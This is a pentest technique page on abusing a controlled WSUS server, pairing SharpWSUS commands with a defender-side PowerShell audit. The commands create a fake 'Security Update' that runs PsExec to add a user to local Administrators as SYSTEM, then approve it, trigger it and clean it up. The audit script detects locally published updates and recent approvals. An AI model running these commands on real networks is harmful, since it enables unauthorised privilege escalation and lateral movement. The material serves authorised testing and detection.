WSUS

When we already control the WSUS server (local admin on the WSUS host, or an account with WSUS Approver / Administrator role), the legitimate update channel becomes a lateral-movement primitive: we craft an "update" that runs an arbitrary Microsoft-signed binary with a command line of our choosing, approve it for a target computer group, and the targets execute the payload as NT AUTHORITY\SYSTEM on their next check-in.

For the related on-path / MitM scenario against an HTTP WSUS feed (no WSUS admin required), see Privilege escalation: WSUS.

Prerequisites

  • Admin (or equivalent WSUS role) on the WSUS server, or ability to reach the WSUS database (SUSDB).
  • The target hosts pull updates from this WSUS instance and are members of the computer group you will approve the update for.
  • A Microsoft-signed binary suitable as a payload (PsExec64.exe, BgInfo.exe, etc.) reachable from the WSUS server.

SharpWSUS

SharpWSUS talks to the local WSUS service to create, approve and clean up fake updates targeted at specific downstream clients.

```cmd
:: Stage the fake update
SharpWSUS.exe create  /payload:"C:\Tools\PsExec64.exe" ^
                      /args:"/accepteula /s cmd.exe /c net localgroup Administrators <DOMAIN>\<user> /add" ^
                      /title:"Security Update KB5099999"

:: Approve it for a target group
SharpWSUS.exe approve /updateid:<GUID> /computername:<target-fqdn> /groupname:"Pentest"

:: Confirm the client picked it up
SharpWSUS.exe check   /updateid:<GUID> /computername:<target-fqdn>

:: Cleanup
SharpWSUS.exe delete  /updateid:<GUID> /computername:<target-fqdn> /groupname:"Pentest"
```

For non-English systems, target the well-known Administrators SID instead of the localised group name:

```text
/accepteula /s cmd.exe /c "net localgroup S-1-5-32-544 <DOMAIN>\<user> /add"
```

To trigger the install immediately on the target (rather than waiting for the next scheduled poll), run from any shell on that host:

```cmd
:: Windows 10/11 (a trailing "::" is not a comment in cmd, so keep comments on their own line)
usoclient StartScan

:: older Windows
wuauclt /detectnow
```

Cleanup

  • Delete the approved update from the WSUS catalogue (SharpWSUS.exe delete ...).
  • Remove any local accounts / group memberships the payload created.
  • Document the WSUS admin path used (compromised account, weak ACL on SUSDB, etc.) so the remediation finding targets the root cause, not just the symptom.
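The audit below is an added defender-side check, not part of SharpWSUS or of these notes. Run on the WSUS server by a WSUS administrator, it lists every update in the catalogue that did not arrive from Microsoft Update (an update staged through the WSUS API, as the `create` step above does, is locally published and carries a different `UpdateSource`), shows who approved it for which computer group and when, lists all approvals made in the last few days, and dumps the membership of the local `WSUS Administrators` group, which is one of the admin paths this technique relies on. It assumes the `UpdateServices` PowerShell module that ships with the WSUS role (`Get-WsusServer`), and the `IUpdate.UpdateSource`, `GetUpdateApprovals()` and `IUpdateApproval.AdministratorName` members of the WSUS administration API; `-Days` is an arbitrary look-back window.

```powershell
# Added example: audit a WSUS server for locally published updates and recent approvals.
# Assumptions: UpdateServices module present (WSUS role), run as a WSUS administrator.
param([int]$Days = 7)

Import-Module UpdateServices -ErrorAction Stop
$wsus = Get-WsusServer            # IUpdateServer for the local WSUS instance
$since = (Get-Date).AddDays(-$Days)

function Get-ApprovalSummary($update) {
    # Flatten each approval to "Action -> group by admin at time"
    $update.GetUpdateApprovals() | ForEach-Object {
        '{0} -> {1} by {2} at {3}' -f $_.Action, $_.GetComputerTargetGroup().Name,
                                      $_.AdministratorName, $_.CreationDate
    }
}

Write-Host "== Updates not sourced from Microsoft Update ==" -ForegroundColor Cyan
$scope = New-Object Microsoft.UpdateServices.Administration.UpdateScope
$wsus.GetUpdates($scope) |
    Where-Object { $_.UpdateSource -ne [Microsoft.UpdateServices.Administration.UpdateSource]::MicrosoftUpdate } |
    ForEach-Object {
        [pscustomobject]@{
            UpdateId  = $_.Id.UpdateId
            Title     = $_.Title
            Created   = $_.CreationDate
            Source    = $_.UpdateSource
            Approvals = (Get-ApprovalSummary $_) -join '; '
        }
    } | Format-List

Write-Host "== Approvals created in the last $Days day(s) ==" -ForegroundColor Cyan
# A brand-new approval of a "Security Update KBxxxxxxx" to a small custom group,
# made by an account that does not normally administer WSUS, is the pattern to look for.
$wsus.GetUpdates($scope) | ForEach-Object {
    $u = $_
    $u.GetUpdateApprovals() | Where-Object { $_.CreationDate -ge $since } | ForEach-Object {
        [pscustomobject]@{
            When     = $_.CreationDate
            Admin    = $_.AdministratorName
            Action   = $_.Action
            Group    = $_.GetComputerTargetGroup().Name
            UpdateId = $u.Id.UpdateId
            Title    = $u.Title
        }
    }
} | Sort-Object When -Descending | Format-Table -AutoSize

Write-Host "== Members of the local 'WSUS Administrators' group ==" -ForegroundColor Cyan
# This local group grants full WSUS console/API rights; verify every member is expected.
Get-LocalGroupMember -Group 'WSUS Administrators' | Select-Object Name, ObjectClass, PrincipalSource
```

On a healthy server the first section is empty unless the organisation genuinely publishes third-party updates; every entry there should map to a known publishing pipeline. Comparing the approval list against change tickets, and the group membership against the intended administrator set, gives the "root cause" evidence the last cleanup bullet asks for.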